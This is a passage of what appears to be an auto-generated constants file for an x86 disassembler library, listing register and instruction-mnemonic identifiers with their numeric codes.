X86_REG_R11D = 229 X86_REG_R12D = 230 X86_REG_R13D = 231 X86_REG_R14D = 232 X86_REG_R15D = 233 X86_REG_R8W = 234 X86_REG_R9W = 235 X86_REG_R10W = 236 X86_REG_R11W = 237 X86_REG_R12W = 238 X86_REG_R13W = 239 X86_REG_R14W = 240 X86_REG_R15W = 241 X86_REG_IDTR = 242 X86_REG_GDTR = 243 X86_REG_LDTR = 244 X86_REG_TR = 245 X86_REG_FPCW = 246 X86_REG_FPTAG = 247 X86_REG_MSR = 248 X86_REG_MXCSR = 249 X86_REG_FS_BASE = 250 X86_REG_GS_BASE = 251 X86_REG_FLAGS = 252 X86_REG_RFLAGS = 253 X86_REG_FIP = 254 X86_REG_FCS = 255 X86_REG_FDP = 256 X86_REG_FDS = 257 X86_REG_FOP = 258 X86_REG_ENDING = 259 // X86 instructions X86_INS_INVALID = 0 X86_INS_AAA = 1 X86_INS_AAD = 2 X86_INS_AAM = 3 X86_INS_AAS = 4 X86_INS_FABS = 5 X86_INS_ADC = 6 X86_INS_ADCX = 7 X86_INS_ADD = 8 X86_INS_ADDPD = 9 X86_INS_ADDPS = 10 X86_INS_ADDSD = 11 X86_INS_ADDSS = 12 X86_INS_ADDSUBPD = 13 X86_INS_ADDSUBPS = 14 X86_INS_FADD = 15 X86_INS_FIADD = 16 X86_INS_FADDP = 17 X86_INS_ADOX = 18 X86_INS_AESDECLAST = 19 X86_INS_AESDEC = 20 X86_INS_AESENCLAST = 21 X86_INS_AESENC = 22 X86_INS_AESIMC = 23 X86_INS_AESKEYGENASSIST = 24 X86_INS_AND = 25 X86_INS_ANDN = 26 X86_INS_ANDNPD = 27 X86_INS_ANDNPS = 28 X86_INS_ANDPD = 29 X86_INS_ANDPS = 30 X86_INS_ARPL = 31 X86_INS_BEXTR = 32 X86_INS_BLCFILL = 33 X86_INS_BLCI = 34 X86_INS_BLCIC = 35 X86_INS_BLCMSK = 36 X86_INS_BLCS = 37 X86_INS_BLENDPD = 38 X86_INS_BLENDPS = 39 X86_INS_BLENDVPD = 40 X86_INS_BLENDVPS = 41 X86_INS_BLSFILL = 42 X86_INS_BLSI = 43 X86_INS_BLSIC = 44 X86_INS_BLSMSK = 45 X86_INS_BLSR = 46 X86_INS_BOUND = 47 X86_INS_BSF = 48 X86_INS_BSR = 49 X86_INS_BSWAP = 50 X86_INS_BT = 51 X86_INS_BTC = 52 X86_INS_BTR = 53 X86_INS_BTS = 54 X86_INS_BZHI = 55 X86_INS_CALL = 56 X86_INS_CBW = 57 X86_INS_CDQ = 58 X86_INS_CDQE = 59 X86_INS_FCHS = 60 X86_INS_CLAC = 61 X86_INS_CLC = 62 X86_INS_CLD = 63 X86_INS_CLFLUSH = 64 X86_INS_CLFLUSHOPT = 65 X86_INS_CLGI = 66 X86_INS_CLI = 67 X86_INS_CLTS = 68 X86_INS_CLWB = 69 X86_INS_CMC = 70 X86_INS_CMOVA = 71 X86_INS_CMOVAE = 72 X86_INS_CMOVB = 73 X86_INS_CMOVBE = 74 X86_INS_FCMOVBE = 75 X86_INS_FCMOVB = 76 X86_INS_CMOVE = 77 X86_INS_FCMOVE = 78 X86_INS_CMOVG = 79 X86_INS_CMOVGE = 80 X86_INS_CMOVL = 81 X86_INS_CMOVLE = 82 X86_INS_FCMOVNBE = 83 X86_INS_FCMOVNB = 84 X86_INS_CMOVNE = 85 X86_INS_FCMOVNE = 86 X86_INS_CMOVNO = 87 X86_INS_CMOVNP = 88 X86_INS_FCMOVNU = 89 X86_INS_CMOVNS = 90 X86_INS_CMOVO = 91 X86_INS_CMOVP = 92 X86_INS_FCMOVU = 93 X86_INS_CMOVS = 94 X86_INS_CMP = 95 X86_INS_CMPPD = 96 X86_INS_CMPPS = 97 X86_INS_CMPSB = 98 X86_INS_CMPSD = 99 X86_INS_CMPSQ = 100 X86_INS_CMPSS = 101 X86_INS_CMPSW = 102 X86_INS_CMPXCHG16B = 103 X86_INS_CMPXCHG = 104 X86_INS_CMPXCHG8B = 105 X86_INS_COMISD = 106 X86_INS_COMISS = 107 X86_INS_FCOMP = 108 X86_INS_FCOMPI = 109 X86_INS_FCOMI = 110 X86_INS_FCOM = 111 X86_INS_FCOS = 112 X86_INS_CPUID = 113 X86_INS_CQO = 114 X86_INS_CRC32 = 115 X86_INS_CVTDQ2PD = 116 X86_INS_CVTDQ2PS = 117 X86_INS_CVTPD2DQ = 118 X86_INS_CVTPD2PS = 119 X86_INS_CVTPS2DQ = 120 X86_INS_CVTPS2PD = 121 X86_INS_CVTSD2SI = 122 X86_INS_CVTSD2SS = 123 X86_INS_CVTSI2SD = 124 X86_INS_CVTSI2SS = 125 X86_INS_CVTSS2SD = 126 X86_INS_CVTSS2SI = 127 X86_INS_CVTTPD2DQ = 128 X86_INS_CVTTPS2DQ = 129 X86_INS_CVTTSD2SI = 130 X86_INS_CVTTSS2SI = 131 X86_INS_CWD = 132 X86_INS_CWDE = 133 X86_INS_DAA = 134 X86_INS_DAS = 135 X86_INS_DATA16 = 136 X86_INS_DEC = 137 X86_INS_DIV = 138 X86_INS_DIVPD = 139 X86_INS_DIVPS = 140 X86_INS_FDIVR = 141 X86_INS_FIDIVR = 142 X86_INS_FDIVRP = 143 X86_INS_DIVSD = 144 X86_INS_DIVSS = 145 X86_INS_FDIV = 146 X86_INS_FIDIV = 147 X86_INS_FDIVP = 148 X86_INS_DPPD = 149 X86_INS_DPPS = 150 X86_INS_RET = 151 X86_INS_ENCLS = 152 X86_INS_ENCLU = 153 X86_INS_ENTER = 154 X86_INS_EXTRACTPS = 155 X86_INS_EXTRQ = 156 X86_INS_F2XM1 = 157 X86_INS_LCALL = 158 X86_INS_LJMP = 159 X86_INS_FBLD = 160 X86_INS_FBSTP = 161 X86_INS_FCOMPP = 162 X86_INS_FDECSTP = 163 X86_INS_FEMMS = 164 X86_INS_FFREE = 165 X86_INS_FICOM = 166 X86_INS_FICOMP = 167 X86_INS_FINCSTP = 168 X86_INS_FLDCW = 169 X86_INS_FLDENV = 170 X86_INS_FLDL2E = 171 X86_INS_FLDL2T = 172 X86_INS_FLDLG2 = 173 X86_INS_FLDLN2 = 174 X86_INS_FLDPI = 175 X86_INS_FNCLEX = 176 X86_INS_FNINIT = 177 X86_INS_FNOP = 178 X86_INS_FNSTCW = 179 X86_INS_FNSTSW = 180 X86_INS_FPATAN = 181 X86_INS_FPREM = 182 X86_INS_FPREM1 = 183 X86_INS_FPTAN = 184 X86_INS_FFREEP = 185 X86_INS_FRNDINT = 186 X86_INS_FRSTOR = 187 X86_INS_FNSAVE = 188 X86_INS_FSCALE = 189 X86_INS_FSETPM = 190 X86_INS_FSINCOS = 191 X86_INS_FNSTENV = 192 X86_INS_FXAM = 193 X86_INS_FXRSTOR = 194 X86_INS_FXRSTOR64 = 195 X86_INS_FXSAVE = 196 X86_INS_FXSAVE64 = 197 X86_INS_FXTRACT = 198 X86_INS_FYL2X = 199 X86_INS_FYL2XP1 = 200 X86_INS_MOVAPD = 201 X86_INS_MOVAPS = 202 X86_INS_ORPD = 203 X86_INS_ORPS = 204 X86_INS_VMOVAPD = 205 X86_INS_VMOVAPS = 206 X86_INS_XORPD = 207 X86_INS_XORPS = 208 X86_INS_GETSEC = 209 X86_INS_HADDPD = 210 X86_INS_HADDPS = 211 X86_INS_HLT = 212 X86_INS_HSUBPD = 213 X86_INS_HSUBPS = 214 X86_INS_IDIV = 215 X86_INS_FILD = 216 X86_INS_IMUL = 217 X86_INS_IN = 218 X86_INS_INC = 219 X86_INS_INSB = 220 X86_INS_INSERTPS = 221 X86_INS_INSERTQ = 222 X86_INS_INSD = 223 X86_INS_INSW = 224 X86_INS_INT = 225 X86_INS_INT1 = 226 X86_INS_INT3 = 227 X86_INS_INTO = 228 X86_INS_INVD = 229 X86_INS_INVEPT = 230 X86_INS_INVLPG = 231 X86_INS_INVLPGA = 232 X86_INS_INVPCID = 233 X86_INS_INVVPID = 234 X86_INS_IRET = 235 X86_INS_IRETD = 236 X86_INS_IRETQ = 237 X86_INS_FISTTP = 238 X86_INS_FIST = 239 X86_INS_FISTP = 240 X86_INS_UCOMISD = 241 X86_INS_UCOMISS = 242 X86_INS_VCOMISD = 243 X86_INS_VCOMISS = 244 X86_INS_VCVTSD2SS = 245 X86_INS_VCVTSI2SD = 246 X86_INS_VCVTSI2SS = 247 X86_INS_VCVTSS2SD = 248 X86_INS_VCVTTSD2SI = 249 X86_INS_VCVTTSD2USI = 250 X86_INS_VCVTTSS2SI = 251 X86_INS_VCVTTSS2USI = 252 X86_INS_VCVTUSI2SD = 253 X86_INS_VCVTUSI2SS = 254 X86_INS_VUCOMISD = 255 X86_INS_VUCOMISS = 256 X86_INS_JAE = 257 X86_INS_JA = 258 X86_INS_JBE = 259 X86_INS_JB = 260 X86_INS_JCXZ = 261 X86_INS_JECXZ = 262 X86_INS_JE = 263 X86_INS_JGE = 264 X86_INS_JG = 265 X86_INS_JLE = 266 X86_INS_JL = 267 X86_INS_JMP = 268 X86_INS_JNE = 269 X86_INS_JNO = 270 X86_INS_JNP = 271 X86_INS_JNS = 272 X86_INS_JO = 273 X86_INS_JP = 274 X86_INS_JRCXZ = 275 X86_INS_JS = 276 X86_INS_KANDB = 277 X86_INS_KANDD = 278 X86_INS_KANDNB = 279 X86_INS_KANDND = 280 X86_INS_KANDNQ = 281 X86_INS_KANDNW = 282 X86_INS_KANDQ = 283 X86_INS_KANDW = 284 X86_INS_KMOVB = 285 X86_INS_KMOVD = 286 X86_INS_KMOVQ = 287 X86_INS_KMOVW = 288 X86_INS_KNOTB = 289 X86_INS_KNOTD = 290 X86_INS_KNOTQ = 291 X86_INS_KNOTW = 292 X86_INS_KORB = 293 X86_INS_KORD = 294 X86_INS_KORQ = 295 X86_INS_KORTESTB = 296 X86_INS_KORTESTD = 297 X86_INS_KORTESTQ = 298 X86_INS_KORTESTW = 299 X86_INS_KORW = 300 X86_INS_KSHIFTLB = 301 X86_INS_KSHIFTLD = 302 X86_INS_KSHIFTLQ = 303 X86_INS_KSHIFTLW = 304 X86_INS_KSHIFTRB = 305 X86_INS_KSHIFTRD = 306 X86_INS_KSHIFTRQ = 307 X86_INS_KSHIFTRW = 308 X86_INS_KUNPCKBW = 309 X86_INS_KXNORB = 310 X86_INS_KXNORD = 311 X86_INS_KXNORQ = 312 X86_INS_KXNORW = 313 X86_INS_KXORB = 314 X86_INS_KXORD = 315 X86_INS_KXORQ = 316 X86_INS_KXORW = 317 X86_INS_LAHF = 318 X86_INS_LAR = 319 X86_INS_LDDQU = 320 X86_INS_LDMXCSR = 321 X86_INS_LDS = 322 X86_INS_FLDZ = 323 X86_INS_FLD1 = 324 X86_INS_FLD = 325 X86_INS_LEA = 326 X86_INS_LEAVE = 327 X86_INS_LES = 328 X86_INS_LFENCE = 329 X86_INS_LFS = 330 X86_INS_LGDT = 331 X86_INS_LGS = 332 X86_INS_LIDT = 333 X86_INS_LLDT = 334 X86_INS_LMSW = 335 X86_INS_OR = 336 X86_INS_SUB = 337 X86_INS_XOR = 338 X86_INS_LODSB = 339 X86_INS_LODSD = 340 X86_INS_LODSQ = 341 X86_INS_LODSW = 342 X86_INS_LOOP = 343 X86_INS_LOOPE = 344 X86_INS_LOOPNE = 345 X86_INS_RETF = 346 X86_INS_RETFQ = 347 X86_INS_LSL = 348 X86_INS_LSS = 349 X86_INS_LTR = 350 X86_INS_XADD = 351 X86_INS_LZCNT = 352 X86_INS_MASKMOVDQU = 353 X86_INS_MAXPD = 354 X86_INS_MAXPS = 355 X86_INS_MAXSD = 356 X86_INS_MAXSS = 357 X86_INS_MFENCE = 358 X86_INS_MINPD = 359 X86_INS_MINPS = 360 X86_INS_MINSD = 361 X86_INS_MINSS = 362 X86_INS_CVTPD2PI = 363 X86_INS_CVTPI2PD = 364 X86_INS_CVTPI2PS = 365 X86_INS_CVTPS2PI = 366 X86_INS_CVTTPD2PI = 367 X86_INS_CVTTPS2PI = 368 X86_INS_EMMS = 369 X86_INS_MASKMOVQ = 370 X86_INS_MOVD = 371 X86_INS_MOVDQ2Q = 372 X86_INS_MOVNTQ = 373 X86_INS_MOVQ2DQ = 374 X86_INS_MOVQ = 375 X86_INS_PABSB = 376 X86_INS_PABSD = 377 X86_INS_PABSW = 378 X86_INS_PACKSSDW = 379 X86_INS_PACKSSWB = 380 X86_INS_PACKUSWB = 381 X86_INS_PADDB = 382 X86_INS_PADDD = 383 X86_INS_PADDQ = 384 X86_INS_PADDSB = 385 X86_INS_PADDSW = 386 X86_INS_PADDUSB = 387 X86_INS_PADDUSW = 388 X86_INS_PADDW = 389 X86_INS_PALIGNR = 390 X86_INS_PANDN = 391 X86_INS_PAND = 392 X86_INS_PAVGB = 393 X86_INS_PAVGW = 394 X86_INS_PCMPEQB = 395 X86_INS_PCMPEQD = 396 X86_INS_PCMPEQW = 397 X86_INS_PCMPGTB = 398 X86_INS_PCMPGTD = 399 X86_INS_PCMPGTW = 400 X86_INS_PEXTRW = 401 X86_INS_PHADDSW = 402 X86_INS_PHADDW = 403 X86_INS_PHADDD = 404 X86_INS_PHSUBD = 405 X86_INS_PHSUBSW = 406 X86_INS_PHSUBW = 407 X86_INS_PINSRW = 408 X86_INS_PMADDUBSW = 409 X86_INS_PMADDWD = 410 X86_INS_PMAXSW = 411 X86_INS_PMAXUB = 412 X86_INS_PMINSW = 413 X86_INS_PMINUB = 414 X86_INS_PMOVMSKB = 415 X86_INS_PMULHRSW = 416 X86_INS_PMULHUW = 417 X86_INS_PMULHW = 418 X86_INS_PMULLW = 419 X86_INS_PMULUDQ = 420 X86_INS_POR = 421 X86_INS_PSADBW = 422 X86_INS_PSHUFB = 423 X86_INS_PSHUFW = 424 X86_INS_PSIGNB = 425 X86_INS_PSIGND = 426 X86_INS_PSIGNW = 427 X86_INS_PSLLD = 428 X86_INS_PSLLQ = 429 X86_INS_PSLLW = 430 X86_INS_PSRAD = 431 X86_INS_PSRAW = 432 X86_INS_PSRLD = 433 X86_INS_PSRLQ = 434 X86_INS_PSRLW = 435 X86_INS_PSUBB = 436 X86_INS_PSUBD = 437 X86_INS_PSUBQ = 438 X86_INS_PSUBSB = 439 X86_INS_PSUBSW = 440 X86_INS_PSUBUSB = 441 X86_INS_PSUBUSW = 442 X86_INS_PSUBW = 443 X86_INS_PUNPCKHBW = 444 X86_INS_PUNPCKHDQ = 445 X86_INS_PUNPCKHWD = 446 X86_INS_PUNPCKLBW = 447 X86_INS_PUNPCKLDQ = 448 X86_INS_PUNPCKLWD = 449 X86_INS_PXOR = 450 X86_INS_MONITOR = 451 X86_INS_MONTMUL = 452 X86_INS_MOV = 453 X86_INS_MOVABS = 454 X86_INS_MOVBE = 455 X86_INS_MOVDDUP = 456 X86_INS_MOVDQA = 457 X86_INS_MOVDQU = 458 X86_INS_MOVHLPS = 459 X86_INS_MOVHPD = 460 X86_INS_MOVHPS = 461 X86_INS_MOVLHPS = 462 X86_INS_MOVLPD = 463 X86_INS_MOVLPS = 464 X86_INS_MOVMSKPD = 465 X86_INS_MOVMSKPS = 466 X86_INS_MOVNTDQA = 467 X86_INS_MOVNTDQ = 468 X86_INS_MOVNTI = 469 X86_INS_MOVNTPD = 470 X86_INS_MOVNTPS = 471 X86_INS_MOVNTSD = 472 X86_INS_MOVNTSS = 473 X86_INS_MOVSB = 474 X86_INS_MOVSD = 475 X86_INS_MOVSHDUP = 476 X86_INS_MOVSLDUP = 477 X86_INS_MOVSQ = 478 X86_INS_MOVSS = 479 X86_INS_MOVSW = 480 X86_INS_MOVSX = 481 X86_INS_MOVSXD = 482 X86_INS_MOVUPD = 483 X86_INS_MOVUPS = 484 X86_INS_MOVZX = 485 X86_INS_MPSADBW = 486 X86_INS_MUL = 487 X86_INS_MULPD = 488 X86_INS_MULPS = 489 X86_INS_MULSD = 490 X86_INS_MULSS = 491 X86_INS_MULX = 492 X86_INS_FMUL = 493 X86_INS_FIMUL = 494 X86_INS_FMULP = 495 X86_INS_MWAIT = 496 X86_INS_NEG = 497 X86_INS_NOP = 498 X86_INS_NOT = 499 X86_INS_OUT = 500 X86_INS_OUTSB = 501 X86_INS_OUTSD = 502 X86_INS_OUTSW = 503 X86_INS_PACKUSDW = 504 X86_INS_PAUSE = 505 X86_INS_PAVGUSB = 506 X86_INS_PBLENDVB = 507 X86_INS_PBLENDW = 508 X86_INS_PCLMULQDQ = 509 X86_INS_PCMPEQQ = 510 X86_INS_PCMPESTRI = 511 X86_INS_PCMPESTRM = 512 X86_INS_PCMPGTQ = 513 X86_INS_PCMPISTRI = 514 X86_INS_PCMPISTRM = 515 X86_INS_PCOMMIT = 516 X86_INS_PDEP = 517 X86_INS_PEXT = 518 X86_INS_PEXTRB = 519 X86_INS_PEXTRD = 520 X86_INS_PEXTRQ = 521 X86_INS_PF2ID = 522 X86_INS_PF2IW = 523 X86_INS_PFACC = 524 X86_INS_PFADD = 525 X86_INS_PFCMPEQ = 526 X86_INS_PFCMPGE = 527 X86_INS_PFCMPGT = 528 X86_INS_PFMAX = 529 X86_INS_PFMIN = 530 X86_INS_PFMUL = 531 X86_INS_PFNACC = 532 X86_INS_PFPNACC = 533 X86_INS_PFRCPIT1 = 534 X86_INS_PFRCPIT2 = 535 X86_INS_PFRCP = 536 X86_INS_PFRSQIT1 = 537 X86_INS_PFRSQRT = 538 X86_INS_PFSUBR = 539 X86_INS_PFSUB = 540 X86_INS_PHMINPOSUW = 541 X86_INS_PI2FD = 542 X86_INS_PI2FW = 543 X86_INS_PINSRB = 544 X86_INS_PINSRD = 545 X86_INS_PINSRQ = 546 X86_INS_PMAXSB = 547 X86_INS_PMAXSD = 548 X86_INS_PMAXUD = 549 X86_INS_PMAXUW = 550 X86_INS_PMINSB = 551 X86_INS_PMINSD = 552 X86_INS_PMINUD = 553 X86_INS_PMINUW = 554 X86_INS_PMOVSXBD = 555 X86_INS_PMOVSXBQ = 556 X86_INS_PMOVSXBW = 557 X86_INS_PMOVSXDQ = 558 X86_INS_PMOVSXWD = 559 X86_INS_PMOVSXWQ = 560 X86_INS_PMOVZXBD = 561 X86_INS_PMOVZXBQ = 562 X86_INS_PMOVZXBW = 563 X86_INS_PMOVZXDQ = 564 X86_INS_PMOVZXWD = 565 X86_INS_PMOVZXWQ = 566 X86_INS_PMULDQ = 567 X86_INS_PMULHRW = 568 X86_INS_PMULLD = 569 X86_INS_POP = 570 X86_INS_POPAW = 571 X86_INS_POPAL = 572 X86_INS_POPCNT = 573 X86_INS_POPF = 574 X86_INS_POPFD = 575 X86_INS_POPFQ = 576 X86_INS_PREFETCH = 577 X86_INS_PREFETCHNTA = 578 X86_INS_PREFETCHT0 = 579 X86_INS_PREFETCHT1 = 580 X86_INS_PREFETCHT2 = 581 X86_INS_PREFETCHW = 582 X86_INS_PSHUFD = 583 X86_INS_PSHUFHW = 584 X86_INS_PSHUFLW = 585 X86_INS_PSLLDQ = 586 X86_INS_PSRLDQ = 587 X86_INS_PSWAPD = 588 X86_INS_PTEST = 589 X86_INS_PUNPCKHQDQ = 590 X86_INS_PUNPCKLQDQ = 591 X86_INS_PUSH = 592 X86_INS_PUSHAW = 593 X86_INS_PUSHAL = 594 X86_INS_PUSHF = 595 X86_INS_PUSHFD = 596 X86_INS_PUSHFQ = 597 X86_INS_RCL = 598 X86_INS_RCPPS = 599 X86_INS_RCPSS = 600 X86_INS_RCR = 601 X86_INS_RDFSBASE = 602 X86_INS_RDGSBASE = 603 X86_INS_RDMSR = 604 X86_INS_RDPMC = 605 X86_INS_RDRAND = 606 X86_INS_RDSEED = 607 X86_INS_RDTSC = 608 X86_INS_RDTSCP = 609 X86_INS_ROL = 610 X86_INS_ROR = 611 X86_INS_RORX = 612 X86_INS_ROUNDPD = 613 X86_INS_ROUNDPS = 614 X86_INS_ROUNDSD = 615 X86_INS_ROUNDSS = 616 X86_INS_RSM = 617 X86_INS_RSQRTPS = 618 X86_INS_RSQRTSS = 619 X86_INS_SAHF = 620 X86_INS_SAL = 621 X86_INS_SALC = 622 X86_INS_SAR = 623 X86_INS_SARX = 624 X86_INS_SBB = 625 X86_INS_SCASB = 626 X86_INS_SCASD = 627 X86_INS_SCASQ = 628 X86_INS_SCASW = 629 X86_INS_SETAE = 630 X86_INS_SETA = 631 X86_INS_SETBE = 632 X86_INS_SETB = 633 X86_INS_SETE = 634 X86_INS_SETGE = 635 X86_INS_SETG = 636 X86_INS_SETLE = 637 X86_INS_SETL = 638 X86_INS_SETNE = 639 X86_INS_SETNO = 640 X86_INS_SETNP = 641 X86_INS_SETNS = 642 X86_INS_SETO = 643 X86_INS_SETP = 644 X86_INS_SETS = 645 X86_INS_SFENCE = 646 X86_INS_SGDT = 647 X86_INS_SHA1MSG1 = 648 X86_INS_SHA1MSG2 = 649 X86_INS_SHA1NEXTE = 650 X86_INS_SHA1RNDS4 = 651 X86_INS_SHA256MSG1 = 652 X86_INS_SHA256MSG2 = 653 X86_INS_SHA256RNDS2 = 654 X86_INS_SHL = 655 X86_INS_SHLD = 656 X86_INS_SHLX = 657 X86_INS_SHR = 658 X86_INS_SHRD = 659 X86_INS_SHRX = 660 X86_INS_SHUFPD = 661 X86_INS_SHUFPS = 662 X86_INS_SIDT = 663 X86_INS_FSIN = 664 X86_INS_SKINIT = 665 X86_INS_SLDT = 666 X86_INS_SMSW = 667 X86_INS_SQRTPD = 668 X86_INS_SQRTPS = 669 X86_INS_SQRTSD = 670 X86_INS_SQRTSS = 671 X86_INS_FSQRT = 672 X86_INS_STAC = 673 X86_INS_STC = 674 X86_INS_STD = 675 X86_INS_STGI = 676 X86_INS_STI = 677 X86_INS_STMXCSR = 678 X86_INS_STOSB = 679 X86_INS_STOSD = 680 X86_INS_STOSQ = 681 X86_INS_STOSW = 682 X86_INS_STR = 683 X86_INS_FST = 684 X86_INS_FSTP = 685 X86_INS_FSTPNCE = 686 X86_INS_FXCH = 687 X86_INS_SUBPD = 688 X86_INS_SUBPS = 689 X86_INS_FSUBR = 690 X86_INS_FISUBR = 691 X86_INS_FSUBRP = 692 X86_INS_SUBSD = 693 X86_INS_SUBSS = 694 X86_INS_FSUB = 695 X86_INS_FISUB = 696 X86_INS_FSUBP = 697 X86_INS_SWAPGS = 698 X86_INS_SYSCALL = 699 X86_INS_SYSENTER = 700 X86_INS_SYSEXIT = 701 X86_INS_SYSRET = 702 X86_INS_T1MSKC = 703 X86_INS_TEST = 704 X86_INS_UD2 = 705 X86_INS_FTST = 706 X86_INS_TZCNT = 707 X86_INS_TZMSK = 708 X86_INS_FUCOMPI = 709 X86_INS_FUCOMI = 710 X86_INS_FUCOMPP = 711 X86_INS_FUCOMP = 712 X86_INS_FUCOM = 713 X86_INS_UD2B = 714 X86_INS_UNPCKHPD = 715 X86_INS_UNPCKHPS = 716 X86_INS_UNPCKLPD = 717 X86_INS_UNPCKLPS = 718 X86_INS_VADDPD = 719 X86_INS_VADDPS = 720 X86_INS_VADDSD = 721 X86_INS_VADDSS = 722 X86_INS_VADDSUBPD = 723 X86_INS_VADDSUBPS = 724 X86_INS_VAESDECLAST = 725 X86_INS_VAESDEC = 726 X86_INS_VAESENCLAST = 727 X86_INS_VAESENC = 728 X86_INS_VAESIMC = 729 X86_INS_VAESKEYGENASSIST = 730 X86_INS_VALIGND = 731 X86_INS_VALIGNQ = 732 X86_INS_VANDNPD = 733 X86_INS_VANDNPS = 734 X86_INS_VANDPD = 735 X86_INS_VANDPS = 736 X86_INS_VBLENDMPD = 737 X86_INS_VBLENDMPS = 738 X86_INS_VBLENDPD = 739 X86_INS_VBLENDPS = 740 X86_INS_VBLENDVPD = 741 X86_INS_VBLENDVPS = 742 X86_INS_VBROADCASTF128 = 743 X86_INS_VBROADCASTI32X4 = 744 X86_INS_VBROADCASTI64X4 = 745 X86_INS_VBROADCASTSD = 746 X86_INS_VBROADCASTSS = 747 X86_INS_VCMPPD = 748 X86_INS_VCMPPS = 749 X86_INS_VCMPSD = 750 X86_INS_VCMPSS = 751 X86_INS_VCOMPRESSPD = 752 X86_INS_VCOMPRESSPS = 753 X86_INS_VCVTDQ2PD = 754 X86_INS_VCVTDQ2PS = 755 X86_INS_VCVTPD2DQX = 756 X86_INS_VCVTPD2DQ = 757 X86_INS_VCVTPD2PSX = 758 X86_INS_VCVTPD2PS = 759 X86_INS_VCVTPD2UDQ = 760 X86_INS_VCVTPH2PS = 761 X86_INS_VCVTPS2DQ = 762 X86_INS_VCVTPS2PD = 763 X86_INS_VCVTPS2PH = 764 X86_INS_VCVTPS2UDQ = 765 X86_INS_VCVTSD2SI = 766 X86_INS_VCVTSD2USI = 767 X86_INS_VCVTSS2SI = 768 X86_INS_VCVTSS2USI = 769 X86_INS_VCVTTPD2DQX = 770 X86_INS_VCVTTPD2DQ = 771 X86_INS_VCVTTPD2UDQ = 772 X86_INS_VCVTTPS2DQ = 773 X86_INS_VCVTTPS2UDQ = 774 X86_INS_VCVTUDQ2PD = 775 X86_INS_VCVTUDQ2PS = 776 X86_INS_VDIVPD = 777 X86_INS_VDIVPS = 778 X86_INS_VDIVSD = 779 X86_INS_VDIVSS = 780 X86_INS_VDPPD = 781 X86_INS_VDPPS = 782 X86_INS_VERR = 783 X86_INS_VERW = 784 X86_INS_VEXP2PD = 785 X86_INS_VEXP2PS = 786 X86_INS_VEXPANDPD = 787 X86_INS_VEXPANDPS = 788 X86_INS_VEXTRACTF128 = 789 X86_INS_VEXTRACTF32X4 = 790 X86_INS_VEXTRACTF64X4 = 791 X86_INS_VEXTRACTI128 = 792 X86_INS_VEXTRACTI32X4 = 793 X86_INS_VEXTRACTI64X4 = 794 X86_INS_VEXTRACTPS = 795 X86_INS_VFMADD132PD = 796 X86_INS_VFMADD132PS = 797 X86_INS_VFMADDPD = 798 X86_INS_VFMADD213PD = 799 X86_INS_VFMADD231PD = 800 X86_INS_VFMADDPS = 801 X86_INS_VFMADD213PS = 802 X86_INS_VFMADD231PS = 803 X86_INS_VFMADDSD = 804 X86_INS_VFMADD213SD = 805 X86_INS_VFMADD132SD = 806 X86_INS_VFMADD231SD = 807 X86_INS_VFMADDSS = 808 X86_INS_VFMADD213SS = 809 X86_INS_VFMADD132SS = 810 X86_INS_VFMADD231SS = 811 X86_INS_VFMADDSUB132PD = 812 X86_INS_VFMADDSUB132PS = 813 X86_INS_VFMADDSUBPD = 814 X86_INS_VFMADDSUB213PD = 815 X86_INS_VFMADDSUB231PD = 816 X86_INS_VFMADDSUBPS = 817 X86_INS_VFMADDSUB213PS = 818 X86_INS_VFMADDSUB231PS = 819 X86_INS_VFMSUB132PD = 820 X86_INS_VFMSUB132PS = 821 X86_INS_VFMSUBADD132PD = 822 X86_INS_VFMSUBADD132PS = 823 X86_INS_VFMSUBADDPD = 824 X86_INS_VFMSUBADD213PD = 825 X86_INS_VFMSUBADD231PD = 826 X86_INS_VFMSUBADDPS = 827 X86_INS_VFMSUBADD213PS = 828 X86_INS_VFMSUBADD231PS = 829 X86_INS_VFMSUBPD = 830 X86_INS_VFMSUB213PD = 831 X86_INS_VFMSUB231PD = 832 X86_INS_VFMSUBPS = 833 X86_INS_VFMSUB213PS = 834 X86_INS_VFMSUB231PS = 835 X86_INS_VFMSUBSD = 836 X86_INS_VFMSUB213SD = 837 X86_INS_VFMSUB132SD = 838 X86_INS_VFMSUB231SD = 839 X86_INS_VFMSUBSS = 840 X86_INS_VFMSUB213SS = 841 X86_INS_VFMSUB132SS = 842 X86_INS_VFMSUB231SS = 843 X86_INS_VFNMADD132PD = 844 X86_INS_VFNMADD132PS = 845 X86_INS_VFNMADDPD = 846 X86_INS_VFNMADD213PD = 847 X86_INS_VFNMADD231PD = 848 X86_INS_VFNMADDPS = 849 X86_INS_VFNMADD213PS = 850 X86_INS_VFNMADD231PS = 851 X86_INS_VFNMADDSD = 852 X86_INS_VFNMADD213SD = 853 X86_INS_VFNMADD132SD = 854 X86_INS_VFNMADD231SD = 855 X86_INS_VFNMADDSS = 856 X86_INS_VFNMADD213SS = 857 X86_INS_VFNMADD132SS = 858 X86_INS_VFNMADD231SS = 859 X86_INS_VFNMSUB132PD = 860 X86_INS_VFNMSUB132PS = 861 X86_INS_VFNMSUBPD = 862 X86_INS_VFNMSUB213PD = 863 X86_INS_VFNMSUB231PD = 864 X86_INS_VFNMSUBPS = 865 X86_INS_VFNMSUB213PS = 866 X86_INS_VFNMSUB231PS = 867 X86_INS_VFNMSUBSD = 868 X86_INS_VFNMSUB213SD = 869 X86_INS_VFNMSUB132SD = 870 X86_INS_VFNMSUB231SD = 871 X86_INS_VFNMSUBSS = 872 X86_INS_VFNMSUB213SS = 873 X86_INS_VFNMSUB132SS = 874 X86_INS_VFNMSUB231SS = 875 X86_INS_VFRCZPD = 876 X86_INS_VFRCZPS = 877 X86_INS_VFRCZSD = 878 X86_INS_VFRCZSS = 879 X86_INS_VORPD = 880 X86_INS_VORPS = 881 X86_INS_VXORPD = 882 X86_INS_VXORPS = 883 X86_INS_VGATHERDPD = 884 X86_INS_VGATHERDPS = 885 X86_INS_VGATHERPF0DPD = 886 X86_INS_VGATHERPF0DPS = 887 X86_INS_VGATHERPF0QPD = 888 X86_INS_VGATHERPF0QPS = 889 X86_INS_VGATHERPF1DPD = 890 X86_INS_VGATHERPF1DPS = 891 X86_INS_VGATHERPF1QPD = 892 X86_INS_VGATHERPF1QPS = 893 X86_INS_VGATHERQPD = 894 X86_INS_VGATHERQPS = 895 X86_INS_VHADDPD = 896 X86_INS_VHADDPS = 897 X86_INS_VHSUBPD = 898 X86_INS_VHSUBPS = 899 X86_INS_VINSERTF128 = 900 X86_INS_VINSERTF32X4 = 901 X86_INS_VINSERTF32X8 = 902 X86_INS_VINSERTF64X2 = 903 X86_INS_VINSERTF64X4 = 904 X86_INS_VINSERTI128 = 905 